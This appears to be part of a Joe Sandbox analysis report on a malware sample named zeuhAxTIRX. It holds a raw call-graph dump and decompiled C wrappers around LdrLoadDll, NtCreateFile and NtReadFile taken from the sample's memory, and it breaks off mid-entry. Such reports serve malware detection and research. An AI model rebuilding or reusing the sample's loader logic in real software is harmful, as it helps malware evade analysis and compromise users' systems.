14561->14559 14563 e713f3 3 API calls 14561->14563 14699 e71363 14561->14699 14565 e688dd 14562->14565 14563->14561 14564 e6893a 14566 e712c3 2 API calls 14564->14566 14565->14564 14690 e713f3 14565->14690 14568 e68950 14566->14568 14569 e6898d 14568->14569 14572 e713f3 3 API calls 14568->14572 14570 e712c3 2 API calls 14569->14570 14571 e68998 14570->14571 14573 e713f3 3 API calls 14571->14573 14579 e689d2 14571->14579 14572->14568 14573->14571 14576 e71323 2 API calls 14577 e68ad1 14576->14577 14578 e71323 2 API calls 14577->14578 14580 e68adb 14578->14580 14696 e71323 14579->14696 14581 e71323 2 API calls 14580->14581 14582 e68ae5 14581->14582 14583 e71323 2 API calls 14582->14583 14583->14554 14585 e69b74 14584->14585 14586 e69203 6 API calls 14585->14586 14591 e69b8a 14586->14591 14587 e69b93 14587->14384 14588 e69bca 14589 e70143 2 API calls 14588->14589 14590 e69bdb 14589->14590 14590->14384 14591->14587 14591->14588 14592 e69c16 14591->14592 14593 e70143 2 API calls 14592->14593 14594 e69c1b 14593->14594 14594->14384 14705 e6ee93 14595->14705 14597 e6f017 14598 e6ee93 LdrLoadDll 14597->14598 14599 e6f020 14598->14599 14600 e6ee93 LdrLoadDll 14599->14600 14601 e6f029 14600->14601 14602 e6ee93 LdrLoadDll 14601->14602 14603 e6f032 14602->14603 14604 e6ee93 LdrLoadDll 14603->14604 14605 e6f03b 14604->14605 14606 e6ee93 LdrLoadDll 14605->14606 14607 e6f044 14606->14607 14608 e6ee93 LdrLoadDll 14607->14608 14609 e6f050 14608->14609 14610 e6ee93 LdrLoadDll 14609->14610 14611 e6f059 14610->14611 14612 e6ee93 LdrLoadDll 14611->14612 14613 e6f062 14612->14613 14614 e6ee93 LdrLoadDll 14613->14614 14615 e6f06b 14614->14615 14616 e6ee93 LdrLoadDll 14615->14616 14617 e6f074 14616->14617 14618 e6ee93 LdrLoadDll 14617->14618 14619 e6f07d 14618->14619 14620 e6ee93 LdrLoadDll 14619->14620 14621 e6f089 14620->14621 14622 e6ee93 LdrLoadDll 14621->14622 14623 e6f092 14622->14623 14624 e6ee93 LdrLoadDll 14623->14624 14625 e6f09b 14624->14625 14626 e6ee93 LdrLoadDll 14625->14626 
14627 e6f0a4 14626->14627 14628 e6ee93 LdrLoadDll 14627->14628 14629 e6f0ad 14628->14629 14630 e6ee93 LdrLoadDll 14629->14630 14631 e6f0b6 14630->14631 14632 e6ee93 LdrLoadDll 14631->14632 14633 e6f0c2 14632->14633 14634 e6ee93 LdrLoadDll 14633->14634 14635 e6f0cb 14634->14635 14636 e6ee93 LdrLoadDll 14635->14636 14637 e6f0d4 14636->14637 14638 e6ee93 LdrLoadDll 14637->14638 14639 e6f0dd 14638->14639 14640 e6ee93 LdrLoadDll 14639->14640 14641 e6f0e6 14640->14641 14642 e6ee93 LdrLoadDll 14641->14642 14643 e6f0ef 14642->14643 14644 e6ee93 LdrLoadDll 14643->14644 14645 e6f0fb 14644->14645 14646 e6ee93 LdrLoadDll 14645->14646 14647 e6f104 14646->14647 14648 e6ee93 LdrLoadDll 14647->14648 14649 e6f10d 14648->14649 14650 e6ee93 LdrLoadDll 14649->14650 14651 e6f116 14650->14651 14652 e6ee93 LdrLoadDll 14651->14652 14653 e6f11f 14652->14653 14654 e6ee93 LdrLoadDll 14653->14654 14655 e6f128 14654->14655 14656 e6ee93 LdrLoadDll 14655->14656 14657 e6f134 14656->14657 14658 e6ee93 LdrLoadDll 14657->14658 14659 e6f13d 14658->14659 14660 e6ee93 LdrLoadDll 14659->14660 14661 e6f146 14660->14661 14662 e6ee93 LdrLoadDll 14661->14662 14663 e6f14f 14662->14663 14664 e6ee93 LdrLoadDll 14663->14664 14665 e6f158 14664->14665 14666 e6ee93 LdrLoadDll 14665->14666 14667 e6f161 14666->14667 14668 e6ee93 LdrLoadDll 14667->14668 14669 e6f16d 14668->14669 14670 e6ee93 LdrLoadDll 14669->14670 14671 e6f176 14670->14671 14672 e6ee93 LdrLoadDll 14671->14672 14673 e6f17f 14672->14673 14673->14388 14675 e6f213 LdrLoadDll 14674->14675 14676 e6e11f 14675->14676 14676->14390 14679 e6f1a5 14677->14679 14678 e6f1b4 14678->14386 14679->14678 14711 e6e703 14679->14711 14683 e6f213 LdrLoadDll 14682->14683 14684 e6e79f NtAllocateVirtualMemory 14683->14684 14684->14551 14686 e712d3 14685->14686 14687 e712d9 14685->14687 14686->14557 14688 e70223 2 API calls 14687->14688 14689 e712ff 14688->14689 14689->14557 14691 e71363 14690->14691 14692 e713c0 14691->14692 14693 e70223 2 API calls 14691->14693 14692->14565 
14694 e7139d 14693->14694 14695 e70143 2 API calls 14694->14695 14695->14692 14697 e70143 2 API calls 14696->14697 14698 e68ac7 14697->14698 14698->14576 14700 e713c0 14699->14700 14701 e71388 14699->14701 14700->14561 14702 e70223 2 API calls 14701->14702 14703 e7139d 14702->14703 14704 e70143 2 API calls 14703->14704 14704->14700 14706 e6eeae 14705->14706 14707 e69613 LdrLoadDll 14706->14707 14708 e6eece 14707->14708 14709 e69613 LdrLoadDll 14708->14709 14710 e6ef82 14708->14710 14709->14710 14710->14597 14710->14710 14712 e6f213 LdrLoadDll 14711->14712 14713 e6e71f 14712->14713 14713->14386 14715 e6f213 LdrLoadDll 14714->14715 14716 e6e8cf RtlFreeHeap 14715->14716 14716->14396 14718 e59453 14717->14718 14719 e5944e 14717->14719 14720 e700c3 2 API calls 14718->14720 14719->14293 14729 e59478 14720->14729 14721 e594db 14721->14293 14722 e6e103 LdrLoadDll 14722->14729 14723 e594e1 14725 e59507 14723->14725 14726 e6e803 LdrLoadDll 14723->14726 14725->14293 14727 e594f8 14726->14727 14727->14293 14728 e700c3 2 API calls 14728->14729 14729->14721 14729->14722 14729->14723 14729->14728 14733 e6e803 14729->14733 14731 e59721 14730->14731 14732 e6e803 LdrLoadDll 14730->14732 14731->14254 14732->14731 14734 e6f213 LdrLoadDll 14733->14734 14735 e6e81f 14734->14735 14735->14729 14737 e5d177 14736->14737 14739 e5d1b1 14737->14739 14740 e6ded3 14737->14740 14739->14303 14741 e6f213 LdrLoadDll 14740->14741 14742 e6deef 14741->14742 14742->14739 14744 e6f8a6 14743->14744 14747 e5cf33 14744->14747 14748 e5cf57 14747->14748 14749 e5cf93 LdrLoadDll 14748->14749 14750 e5bde4 14748->14750 14749->14750 14750->14262 14752 e5d2a6 14751->14752 14753 e6ded3 LdrLoadDll 14752->14753 14754 e5d323 14752->14754 14753->14754 14754->14267 14756 e6f213 LdrLoadDll 14755->14756 14757 e5feee 14756->14757 14757->14275 14758 e6ea13 14757->14758 14759 e6f213 LdrLoadDll 14758->14759 14760 e6ea32 LookupPrivilegeValueW 14759->14760 14760->14271 14762 e6f213 LdrLoadDll 14761->14762 14763 e6e4bf 
14762->14763 14763->14272 14765 e5d42a 14764->14765 14766 e5d283 LdrLoadDll 14765->14766 14767 e5d48d 14766->14767 14767->14224 14769 e60093 14768->14769 14770 e5ffdd 14768->14770 14769->14227 14769->14228 14771 e5d283 LdrLoadDll 14770->14771 14772 e5ffff 14771->14772 14778 e6e183 14772->14778 14774 e60041 14781 e6e1c3 14774->14781 14777 e6e6d3 2 API calls 14777->14769 14779 e6f213 LdrLoadDll 14778->14779 14780 e6e19f 14779->14780 14780->14774 14782 e6f213 LdrLoadDll 14781->14782 14783 e60087 14782->14783 14783->14777 14785 e5ddbe 14784->14785 14786 e5d403 LdrLoadDll 14785->14786 14787 e5de15 14786->14787 14820 e5d083 14787->14820 14789 e5de3b 14819 e5e08c 14789->14819 14829 e68b33 14789->14829 14791 e5de80 14791->14819 14832 e5a073 14791->14832 14793 e5dec4 14793->14819 14854 e6e743 14793->14854 14797 e5df1a 14798 e5df21 14797->14798 14799 e6e253 LdrLoadDll 14797->14799 14800 e70143 2 API calls 14798->14800 14801 e5df5e 14799->14801 14802 e5df2e 14800->14802 14803 e5df6b 14801->14803 14806 e5df7b 14801->14806 14802->14241 14804 e70143 2 API calls 14803->14804 14805 e5df72 14804->14805 14805->14241 14807 e60183 LdrLoadDll 14806->14807 14808 e5dfef 14807->14808 14808->14798 14809 e5dffa 14808->14809 14810 e70143 2 API calls 14809->14810 14811 e5e01e 14810->14811 14864 e6e2a3 14811->14864 14814 e6e253 LdrLoadDll 14815 e5e059 14814->14815 14815->14819 14867 e6e063 14815->14867 14818 e6e8f3 2 API calls 14818->14819 14819->14241 14821 e5d094 14820->14821 14822 e5d090 14820->14822 14823 e5d0ad 14821->14823 14824 e5d0df 14821->14824 14822->14789 14870 e6df13 14823->14870 14825 e6df13 LdrLoadDll 14824->14825 14826 e5d0f0 14825->14826 14826->14789 14830 e60183 LdrLoadDll 14829->14830 14831 e68b59 14830->14831 14831->14791 14873 e5a2a3 14832->14873 14834 e5a299 14834->14793 14835 e5a091 14835->14834 14836 e59443 2 API calls 14835->14836 14837 e5a16f 14835->14837 14847 e5a0cf 14836->14847 14837->14834 14839 e59443 2 API calls 14837->14839 14841 e5a24f 14837->14841 14851 
e5a1ac 14839->14851 14841->14834 14920 e603f3 14841->14920 14842 e603f3 6 API calls 14843 e5a279 14842->14843 14843->14834 14844 e603f3 6 API calls 14843->14844 14845 e5a28f 14844->14845 14845->14793 14847->14837 14848 e5a165 14847->14848 14887 e59d53 14847->14887 14849 e59703 LdrLoadDll 14848->14849 14849->14837 14850 e59d53 7 API calls 14850->14851 14851->14841 14851->14850 14852 e5a245 14851->14852 14853 e59703 LdrLoadDll 14852->14853 14853->14841 14855 e6f213 LdrLoadDll 14854->14855 14856 e5defb 14855->14856 14857 e60183 14856->14857 14858 e601a0 14857->14858 14859 e6e203 LdrLoadDll 14858->14859 14860 e601e1 14859->14860 14861 e601e8 14860->14861 14862 e6e253 LdrLoadDll 14860->14862 14861->14797 14863 e60211 14862->14863 14863->14797 14865 e6f213 LdrLoadDll 14864->14865 14866 e5e032 14865->14866 14866->14814 14868 e6f213 LdrLoadDll 14867->14868 14869 e5e085 14868->14869 14869->14818 14871 e6f213 LdrLoadDll 14870->14871 14872 e5d0cf 14871->14872 14872->14789 14875 e5a2ca 14873->14875 14874 e5a52f 14874->14835 14875->14874 14876 e59443 2 API calls 14875->14876 14877 e5a31d 14876->14877 14877->14874 14878 e59703 LdrLoadDll 14877->14878 14879 e5a3ac 14878->14879 14879->14874 14880 e59443 2 API calls 14879->14880 14881 e5a3c1 14880->14881 14881->14874 14882 e59703 LdrLoadDll 14881->14882 14885 e5a421 14882->14885 14883 e59443 2 API calls 14883->14885 14884 e59d53 7 API calls 14884->14885 14885->14874 14885->14883 14885->14884 14886 e59703 LdrLoadDll 14885->14886 14886->14885 14888 e59d78 14887->14888 14928 e6df53 14888->14928 14891 e59dcc 14891->14847 14892 e59e4d 14961 e602d3 14892->14961 14893 e6e143 LdrLoadDll 14894 e59df0 14893->14894 14894->14892 14896 e59dfb 14894->14896 14898 e59e79 14896->14898 14931 e5e0a3 14896->14931 14897 e59e68 14899 e59e6f 14897->14899 14902 e59e85 14897->14902 14898->14847 14901 e6e6d3 2 API calls 14899->14901 14901->14898 14969 e6dfd3 14902->14969 14904 e59e15 14904->14898 14951 e59b83 14904->14951 14907 e5e0a3 2 API calls 14909 
e59ed0 14907->14909 14909->14898 14972 e6e003 14909->14972 14914 e6e063 LdrLoadDll 14915 e59f1e 14914->14915 14916 e6e6d3 2 API calls 14915->14916 14917 e59f28 14916->14917 14978 e59953 14917->14978 14919 e59f3c 14919->14847 14921 e60418 14920->14921 14922 e59743 6 API calls 14921->14922 14924 e6043c 14922->14924 14923 e5a263 14923->14834 14923->14842 14924->14923 14925 e69203 6 API calls 14924->14925 14927 e70143 2 API calls 14924->14927 15022 e60233 14924->15022 14925->14924 14927->14924 14929 e6f213 LdrLoadDll 14928->14929 14930 e59dc2 14929->14930 14930->14891 14930->14892 14930->14893 14933 e5e0d1 14931->14933 14932 e60183 LdrLoadDll 14934 e5e133 14932->14934 14933->14932 14935 e6e253 LdrLoadDll 14934->14935 14944 e5e17c 14934->14944 14936 e5e15e 14935->14936 14937 e5e168 14936->14937 14940 e5e188 14936->14940 14938 e6e2a3 LdrLoadDll 14937->14938 14939 e5e172 14938->14939 14941 e6e6d3 2 API calls 14939->14941 14942 e5e1f5 14940->14942 14943 e5e212 14940->14943 14941->14944 14945 e6e6d3 2 API calls 14942->14945 14946 e6e2a3 LdrLoadDll 14943->14946 14944->14904 14947 e5e1ff 14945->14947 14948 e5e221 14946->14948 14947->14904 14949 e6e6d3 2 API calls 14948->14949 14950 e5e22b 14949->14950 14950->14904 14953 e59b99 14951->14953 14952 e59d24 14952->14847 14953->14952 14994 e59743 14953->14994 14955 e59c98 14955->14952 14956 e59953 7 API calls 14955->14956 14957 e59cc6 14956->14957 14957->14952 14958 e6e143 LdrLoadDll 14957->14958 14959 e59cfb 14958->14959 14959->14952 14960 e6e743 LdrLoadDll 14959->14960 14960->14952 15001 e6df93 14961->15001 14966 e60344 14966->14897 14967 e6e6d3 2 API calls 14968 e60338 14967->14968 14968->14897 14970 e6f213 LdrLoadDll 14969->14970 14971 e59eb0 14970->14971 14971->14907 14973 e6f213 LdrLoadDll 14972->14973 14974 e59ef5 14973->14974 14975 e6e093 14974->14975 14976 e6f213 LdrLoadDll 14975->14976 14977 e59f0f 14976->14977 14977->14914 14979 e5997c 14978->14979 15007 e598b3 14979->15007 14981 e5998f 14983 e6e743 LdrLoadDll 
14981->14983 14984 e59a1a 14981->14984 14985 e59a15 14981->14985 15015 e60353 14981->15015 14983->14981 14984->14919 14986 e6e6d3 2 API calls 14985->14986 14987 e59a4d 14986->14987 14987->14984 14988 e6df53 LdrLoadDll 14987->14988 14989 e59ab2 14988->14989 14989->14984 14990 e6df93 LdrLoadDll 14989->14990 14991 e59b16 14990->14991 14991->14984 14992 e69203 6 API calls 14991->14992 14993 e59b6b 14992->14993 14993->14919 14995 e59842 14994->14995 14996 e59758 14994->14996 14995->14955 14996->14995 14997 e69203 6 API calls 14996->14997 14999 e597c5 14997->14999 14998 e597ec 14998->14955 14999->14998 15000 e70143 2 API calls 14999->15000 15000->14998 15002 e6f213 LdrLoadDll 15001->15002 15003 e60317 15002->15003 15003->14968 15004 e6e033 15003->15004 15005 e6f213 LdrLoadDll 15004->15005 15006 e60328 15005->15006 15006->14966 15006->14967 15008 e598cd 15007->15008 15009 e5cf33 LdrLoadDll 15008->15009 15010 e598e8 15009->15010 15011 e69613 LdrLoadDll 15010->15011 15012 e59900 15011->15012 15013 e5991c 15012->15013 15014 e59909 PostThreadMessageW 15012->15014 15013->14981 15014->15013 15016 e60366 15015->15016 15019 e6e0d3 15016->15019 15020 e6f213 LdrLoadDll 15019->15020 15021 e60391 15020->15021 15021->14981 15023 e60244 15022->15023 15031 e6e923 15023->15031 15026 e6028b 15026->14924 15027 e6e143 LdrLoadDll 15028 e602a2 15027->15028 15028->15026 15029 e6e743 LdrLoadDll 15028->15029 15030 e602c1 15029->15030 15030->14924 15032 e6f213 LdrLoadDll 15031->15032 15033 e60284 15032->15033 15033->15026 15033->15027 16358 e5bdaf 16359 e6f883 LdrLoadDll 16358->16359 16360 e5bdd0 16359->16360 16361 e6f883 LdrLoadDll 16360->16361 16362 e5bde4 16361->16362 16363 e6f883 LdrLoadDll 16362->16363 16364 e5bdfd 16363->16364 16997 e5fea9 16998 e5fecc 16997->16998 16999 e5d283 LdrLoadDll 16998->16999 17000 e5fedf 16999->17000 17001 e6e423 LdrLoadDll 17000->17001 17002 e5feee 17001->17002 17003 e5ff3d 17002->17003 17004 e6ea13 2 API calls 17002->17004 17005 e5ff05 17004->17005 17006 e5ff30 
17005->17006 17008 e6e4a3 LdrLoadDll 17005->17008 17007 e6e6d3 2 API calls 17006->17007 17007->17003 17008->17006 15368 e600a8 15369 e600b3 15368->15369 15370 e69613 LdrLoadDll 15369->15370 15371 e600d2 15370->15371 15372 e600db GetUserGeoID 15371->15372 15373 e600d9 15371->15373 17016 e5beb6 17017 e5beca 17016->17017 17018 e5bed0 17017->17018 17019 e5be13 7 API calls 17017->17019 17020 e5bed7 17018->17020 17021 e5bdb3 LdrLoadDll 17018->17021 17019->17018 17022 e5bee0 17021->17022 17023 e5feb3 3 API calls 17022->17023 17024 e5bee8 17023->17024 16421 e60180 16422 e601a0 16421->16422 16423 e6e203 LdrLoadDll 16422->16423 16424 e601e1 16423->16424 16425 e601e8 16424->16425 16426 e6e253 LdrLoadDll 16424->16426 16427 e60211 16426->16427 16434 e5dd8f 16435 e5ddbe 16434->16435 16436 e5d403 LdrLoadDll 16435->16436 16437 e5de15 16436->16437 16438 e5d083 LdrLoadDll 16437->16438 16439 e5de3b 16438->16439 16440 e68b33 LdrLoadDll 16439->16440 16469 e5e08c 16439->16469 16441 e5de80 16440->16441 16442 e5a073 8 API calls 16441->16442 16441->16469 16443 e5dec4 16442->16443 16444 e6e743 LdrLoadDll 16443->16444 16443->16469 16445 e5defb 16444->16445 16446 e60183 LdrLoadDll 16445->16446 16447 e5df1a 16446->16447 16448 e5df21 16447->16448 16449 e6e253 LdrLoadDll 16447->16449 16450 e70143 2 API calls 16448->16450 16451 e5df5e 16449->16451 16452 e5df2e 16450->16452 16453 e5df6b 16451->16453 16456 e5df7b 16451->16456 16454 e70143 2 API calls 16453->16454 16455 e5df72 16454->16455 16457 e60183 LdrLoadDll 16456->16457 16458 e5dfef 16457->16458 16458->16448 16459 e5dffa 16458->16459 16460 e70143 2 API calls 16459->16460 16461 e5e01e 16460->16461 16462 e6e2a3 LdrLoadDll 16461->16462 16463 e5e032 16462->16463 16464 e6e253 LdrLoadDll 16463->16464 16465 e5e059 16464->16465 16466 e6e063 LdrLoadDll 16465->16466 16465->16469 16467 e5e085 16466->16467 16468 e6e8f3 2 API calls 16467->16468 16468->16469 15378 e5e09b 15379 e5e0a4 15378->15379 15380 e60183 LdrLoadDll 15379->15380 15381 e5e133 
15380->15381 15382 e5e17c 15381->15382 15383 e6e253 LdrLoadDll 15381->15383 15384 e5e15e 15383->15384 15385 e5e168 15384->15385 15388 e5e188 15384->15388 15386 e6e2a3 LdrLoadDll 15385->15386 15387 e5e172 15386->15387 15389 e6e6d3 2 API calls 15387->15389 15390 e5e1f5 15388->15390 15391 e5e212 15388->15391 15389->15382 15392 e6e6d3 2 API calls 15390->15392 15393 e6e2a3 LdrLoadDll 15391->15393 15394 e5e1ff 15392->15394 15395 e5e221 15393->15395 15396 e6e6d3 2 API calls 15395->15396 15397 e5e22b 15396->15397 17757 e59b75 17758 e59b99 17757->17758 17759 e59743 6 API calls 17758->17759 17763 e59d24 17758->17763 17760 e59c98 17759->17760 17761 e59953 7 API calls 17760->17761 17760->17763 17762 e59cc6 17761->17762 17762->17763 17764 e6e143 LdrLoadDll 17762->17764 17765 e59cfb 17764->17765 17765->17763 17766 e6e743 LdrLoadDll 17765->17766 17766->17763 16575 e5dd7a 16577 e5dd7f 16575->16577 16576 e5dd86 16577->16576 16578 e5d403 LdrLoadDll 16577->16578 16579 e5de15 16578->16579 16580 e5d083 LdrLoadDll 16579->16580 16582 e5de3b 16580->16582 16581 e5e08c 16582->16581 16583 e68b33 LdrLoadDll 16582->16583 16584 e5de80 16583->16584 16584->16581 16585 e5a073 8 API calls 16584->16585 16586 e5dec4 16585->16586 16586->16581 16587 e6e743 LdrLoadDll 16586->16587 16588 e5defb 16587->16588 16589 e60183 LdrLoadDll 16588->16589 16590 e5df1a 16589->16590 16591 e5df21 16590->16591 16592 e6e253 LdrLoadDll 16590->16592 16593 e70143 2 API calls 16591->16593 16594 e5df5e 16592->16594 16595 e5df2e 16593->16595 16596 e5df6b 16594->16596 16599 e5df7b 16594->16599 16597 e70143 2 API calls 16596->16597 16598 e5df72 16597->16598 16600 e60183 LdrLoadDll 16599->16600 16601 e5dfef 16600->16601 16601->16591 16602 e5dffa 16601->16602 16603 e70143 2 API calls 16602->16603 16604 e5e01e 16603->16604 16605 e6e2a3 LdrLoadDll 16604->16605 16606 e5e032 16605->16606 16607 e6e253 LdrLoadDll 16606->16607 16608 e5e059 16607->16608 16608->16581 16609 e6e063 LdrLoadDll 16608->16609 16610 e5e085 16609->16610 16611 
e6e8f3 2 API calls 16610->16611 16611->16581 16625 e59d49 16626 e59d78 16625->16626 16627 e6df53 LdrLoadDll 16626->16627 16628 e59dc2 16627->16628 16629 e59dcc 16628->16629 16630 e59e4d 16628->16630 16631 e6e143 LdrLoadDll 16628->16631 16633 e602d3 2 API calls 16630->16633 16632 e59df0 16631->16632 16632->16630 16634 e59dfb 16632->16634 16635 e59e68 16633->16635 16636 e59e79 16634->16636 16639 e5e0a3 2 API calls 16634->16639 16637 e59e85 16635->16637 16638 e59e6f 16635->16638 16642 e6dfd3 LdrLoadDll 16637->16642 16640 e6e6d3 2 API calls 16638->16640 16641 e59e15 16639->16641 16640->16636 16641->16636 16644 e59b83 7 API calls 16641->16644 16643 e59eb0 16642->16643 16645 e5e0a3 2 API calls 16643->16645 16646 e59e43 16644->16646 16647 e59ed0 16645->16647 16647->16636 16648 e6e003 LdrLoadDll 16647->16648 16649 e59ef5 16648->16649 16650 e6e093 LdrLoadDll 16649->16650 16651 e59f0f 16650->16651 16652 e6e063 LdrLoadDll 16651->16652 16653 e59f1e 16652->16653 16654 e6e6d3 2 API calls 16653->16654 16655 e59f28 16654->16655 16656 e59953 7 API calls 16655->16656 16657 e59f3c 16656->16657 17814 e69b5f 17817 e69b6f 17814->17817 17820 e69bc5 17814->17820 17815 e70143 2 API calls 17816 e69bdb 17815->17816 17818 e69203 6 API calls 17817->17818 17821 e69b8a 17818->17821 17819 e69b93 17820->17815 17821->17819 17821->17820 17822 e69c16 17821->17822 17823 e70143 2 API calls 17822->17823 17824 e69c1b 17823->17824 16684 e5bd5f 16685 e5bd63 16684->16685 16690 e5bc93 16684->16690 16686 e5bd84 16685->16686 16687 e6f883 LdrLoadDll 16685->16687 16687->16686 16688 e59703 LdrLoadDll 16689 e5bd19 16688->16689 16690->16688 17162 e51658 17163 e51662 17162->17163 17165 e73393 11 API calls 17163->17165 17164 e517af 17165->17164 16691 e53529 16692 e5358a 16691->16692 16693 e5dd93 9 API calls 16692->16693 16694 e53597 16692->16694 16693->16694 17831 e5cf28 17833 e5cf57 17831->17833 17832 e5cf5e 17833->17832 17834 e5cf93 LdrLoadDll 17833->17834 17835 e5cfaa 17833->17835 17834->17835 15432 e59436 15433 
e59453 15432->15433 15434 e5944e 15432->15434 15435 e700c3 2 API calls 15433->15435 15441 e59478 15435->15441 15436 e594db 15437 e6e103 LdrLoadDll 15437->15441 15438 e594e1 15440 e59507 15438->15440 15442 e6e803 LdrLoadDll 15438->15442 15439 e6e803 LdrLoadDll 15439->15441 15441->15436 15441->15437 15441->15438 15441->15439 15444 e700c3 2 API calls 15441->15444 15443 e594f8 15442->15443 15444->15441 17339 e5be10 17340 e6ce93 LdrLoadDll 17339->17340 17341 e5be26 17340->17341 17342 e6cd53 LdrLoadDll 17341->17342 17344 e5be2f 17342->17344 17343 e5be39 17344->17343 17345 e6f593 7 API calls 17344->17345 17346 e5be76 17345->17346 17346->17343 17347 e5bc53 2 API calls 17346->17347 17348 e5be96 17347->17348 17349 e5b6b3 LdrLoadDll 17348->17349 17350 e5bea8 17349->17350

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 122 e5cf33-e5cf4f 123 e5cf57-e5cf5c 122->123 124 e5cf52 call e70ee3 122->124 125 e5cf62-e5cf70 call e71403 123->125 126 e5cf5e-e5cf61 123->126 124->123 129 e5cf80-e5cf91 call e6f783 125->129 130 e5cf72-e5cf7d call e71683 125->130 135 e5cf93-e5cfa7 LdrLoadDll 129->135 136 e5cfaa-e5cfad 129->136 130->129 135->136
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E5CF33(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                				char* _v8;
                                                                                                                				struct _EXCEPTION_RECORD _v12;
                                                                                                                				struct _OBJDIR_INFORMATION _v16;
                                                                                                                				char _v536;
                                                                                                                				void* _t15;
                                                                                                                				struct _OBJDIR_INFORMATION _t17;
                                                                                                                				struct _OBJDIR_INFORMATION _t18;
                                                                                                                				void* _t30;
                                                                                                                				void* _t31;
                                                                                                                				void* _t32;
                                                                                                                
                                                                                                                				_v8 =  &_v536;
                                                                                                                				_t15 = E00E70EE3( &_v12, 0x104, _a8);
                                                                                                                				_t31 = _t30 + 0xc;
                                                                                                                				if(_t15 != 0) {
                                                                                                                					_t17 = E00E71403(__eflags, _v8);
                                                                                                                					_t32 = _t31 + 4;
                                                                                                                					__eflags = _t17;
                                                                                                                					if(_t17 != 0) {
                                                                                                                						E00E71683( &_v12, 0);
                                                                                                                						_t32 = _t32 + 8;
                                                                                                                					}
                                                                                                                					_t18 = E00E6F783(_v8);
                                                                                                                					_v16 = _t18;
                                                                                                                					__eflags = _t18;
                                                                                                                					if(_t18 == 0) {
                                                                                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                						return _v16;
                                                                                                                					}
                                                                                                                					return _t18;
                                                                                                                				} else {
                                                                                                                					return _t15;
                                                                                                                				}
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E5CFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 45703d29658771d2e758ce812cc2318878c198cdb6def24393dd66e11465bc29
                                                                                                                • Instruction ID: 06044afd0f64e9fd5297761fdff9ec2413410a9de672b8cf5d6d3822258793dd
                                                                                                                • Opcode Fuzzy Hash: 45703d29658771d2e758ce812cc2318878c198cdb6def24393dd66e11465bc29
                                                                                                                • Instruction Fuzzy Hash: CC015EB1E0020DABDF10DAE4DC56FDDB3B89B54708F1085A5ED08A7240F631EB088BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 137 e6e5a3-e6e5f4 call e6f213 NtCreateFile
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E5A3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                				long _t21;
                                                                                                                
                                                                                                                				_t3 = _a4 + 0xa6c; // 0xa6c
                                                                                                                				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                				return _t21;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,00E6936F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E6936F,?,00000000,00000060,00000000,00000000), ref: 00E6E5F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                • Instruction ID: 0451b68fcca3dae20908b18ceae0c102e27c0818b39341e1f03581229b752ac5
                                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                • Instruction Fuzzy Hash: EAF0B2B2204208ABCB08CF88DC85EEB37EDAF8C754F018208BA0997241C630E8118BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 140 e6e653-e6e69c call e6f213 NtReadFile
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00E6E653(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr* _t27;
                                                                                                                
                                                                                                                				_t3 = _a4 + 0xa74; // 0xa76
                                                                                                                				_t27 = _t3;
                                                                                                                				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                                                                                				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                                                                				return _t18;
                                                                                                                			}






                                                                                                                APIs
